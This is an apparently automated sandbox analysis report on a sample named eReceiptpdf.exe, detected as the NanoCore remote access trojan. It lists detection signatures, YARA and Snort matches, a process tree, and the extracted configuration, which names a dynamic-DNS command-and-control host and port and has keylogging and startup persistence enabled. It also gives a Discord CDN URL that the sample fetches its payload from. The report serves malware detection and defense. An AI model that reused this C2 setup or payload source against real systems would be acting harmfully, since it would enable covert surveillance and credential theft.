Loading ...

Play interactive tourEdit tour

Windows Analysis Report eReceiptpdf.exe

Overview

General Information

Sample Name:eReceiptpdf.exe
Analysis ID:509854
MD5:c97f7f2dea671626ab1c6d3d1ad59422
SHA1:de5bc22d6558a46f99784598f550a3affab19ada
SHA256:9b65db8538653ab63132c23e45852d5455c9cc661655fa217b42a830b0efd24c
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Hides threads from debuggers
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • eReceiptpdf.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\eReceiptpdf.exe' MD5: C97F7F2DEA671626AB1C6D3D1AD59422)
    • eReceiptpdf.exe (PID: 5784 cmdline: C:\Users\user\Desktop\eReceiptpdf.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)
    • WerFault.exe (PID: 6360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • dhcpmon.exe (PID: 6428 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: C97F7F2DEA671626AB1C6D3D1AD59422)
    • dhcpmon.exe (PID: 6564 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)
    • dhcpmon.exe (PID: 1308 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)
    • dhcpmon.exe (PID: 6048 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: C97F7F2DEA671626AB1C6D3D1AD59422)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "d49cd953-2518-4f4a-81ab-2e5bbd26", "Group": "kings", "Domain1": "zeegod.duckdns.org", "Domain2": "", "Port": 8655, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
eReceiptpdf.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x2420b:$x1: https://cdn.discordapp.com/attachments/

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x2420b:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x105ed:$x1: NanoCore.ClientPluginHost
  • 0x1062a:$x2: IClientNetworkHost
  • 0x1415d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x10355:$a: NanoCore
    • 0x10365:$a: NanoCore
    • 0x10599:$a: NanoCore
    • 0x105ad:$a: NanoCore
    • 0x105ed:$a: NanoCore
    • 0x103b4:$b: ClientPlugin
    • 0x105b6:$b: ClientPlugin
    • 0x105f6:$b: ClientPlugin
    • 0x104db:$c: ProjectData
    • 0x10ee2:$d: DESCrypto
    • 0x188ae:$e: KeepAlive
    • 0x1689c:$g: LogClientMessage
    • 0x12a97:$i: get_Connected
    • 0x11218:$j: #=q
    • 0x11248:$j: #=q
    • 0x11264:$j: #=q
    • 0x11294:$j: #=q
    • 0x112b0:$j: #=q
    • 0x112cc:$j: #=q
    • 0x112fc:$j: #=q
    • 0x11318:$j: #=q
    00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x47f4d:$a: NanoCore
      • 0x47fa6:$a: NanoCore
      • 0x47fe3:$a: NanoCore
      • 0x4805c:$a: NanoCore
      • 0x4d5f1:$a: NanoCore
      • 0x4d63b:$a: NanoCore
      • 0x4d825:$a: NanoCore
      • 0x61144:$a: NanoCore
      • 0x61159:$a: NanoCore
      • 0x6118e:$a: NanoCore
      • 0x79bfb:$a: NanoCore
      • 0x79c10:$a: NanoCore
      • 0x79c45:$a: NanoCore
      • 0x47faf:$b: ClientPlugin
      • 0x47fec:$b: ClientPlugin
      • 0x488ea:$b: ClientPlugin
      • 0x488f7:$b: ClientPlugin
      • 0x4d38a:$b: ClientPlugin
      • 0x4d5fa:$b: ClientPlugin
      • 0x4d644:$b: ClientPlugin
      • 0x60f00:$b: ClientPlugin
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      18.2.dhcpmon.exe.30f9658.2.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x42a6:$x1: NanoCore.ClientPluginHost
      18.2.dhcpmon.exe.30f9658.2.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x42a6:$x2: NanoCore.ClientPluginHost
      • 0x4384:$s4: PipeCreated
      • 0x42c0:$s5: IClientLoggingHost
      18.2.dhcpmon.exe.30f9658.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0x66a6:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      18.2.dhcpmon.exe.30f9658.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x66a6:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0x6784:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      • 0x66c0:$s5: IClientLoggingHost
      18.2.dhcpmon.exe.30fe6b8.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1646:$x1: NanoCore.ClientPluginHost
      Click to see the 58 entries

      Sigma Overview

      AV Detection:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Stealing of Sensitive Information:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\eReceiptpdf.exe, ProcessId: 5784, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d49cd953-2518-4f4a-81ab-2e5bbd26", "Group": "kings", "Domain1": "zeegod.duckdns.org", "Domain2": "", "Port": 8655, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 22%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR
      Source: eReceiptpdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49715 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49718 version: TLS 1.0
      Source: eReceiptpdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbI/ source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.Core.ni.pdbRSDSD source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.Xml.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.pdbMZ@ source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: 1}\Servererver32dows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb(1 source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.Configuration.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdble}i source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: .pdb& source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
      Source: Binary string: System.Xml.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.Core.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Users\user\Desktop\eReceiptpdf.exeisualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Servererver32)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUT source: eReceiptpdf.exe, 00000000.00000000.304724116.0000000007830000.00000004.00000001.sdmp
      Source: Binary string: mscorlib.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: mscorlib.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp
      Source: Binary string: System.Core.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: System.Xml.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
      Source: Binary string: jVisualBasic.pdb< source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: System.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 4x nop then add dword ptr [ebp-5Ch], 01h
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 4x nop then jmp 01661155h
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 4x nop then jmp 01661155h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4x nop then add dword ptr [ebp-5Ch], 01h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4x nop then jmp 02DE1155h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4x nop then jmp 02DE1155h

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49716 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49717 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49721 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49724 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49725 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49726 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49730 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49765 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49774 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49776 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49793 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49802 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49804 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49805 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49806 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49807 -> 45.133.1.211:8655
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49808 -> 45.133.1.211:8655
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs:
      Source: Malware configuration extractorURLs: zeegod.duckdns.org
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: zeegod.duckdns.org
      Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
      Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49715 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49718 version: TLS 1.0
      Source: global trafficTCP traffic: 192.168.2.3:49716 -> 45.133.1.211:8655
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: eReceiptpdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: eReceiptpdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: eReceiptpdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: eReceiptpdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: eReceiptpdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: eReceiptpdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: eReceiptpdf.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: eReceiptpdf.exeString found in binary or memory: http://ocsp.digicert.com0O
      Source: eReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: dhcpmon.exe, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmp, eReceiptpdf.exeString found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
      Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
      Source: eReceiptpdf.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: eReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
      Source: dhcpmon.exe, eReceiptpdf.exeString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg
      Source: eReceiptpdf.exeString found in binary or memory: https://www.digicert.com/CPS0
      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 18.2.dhcpmon.exe.30f9658.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.dhcpmon.exe.30f9658.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 18.2.dhcpmon.exe.30fe6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
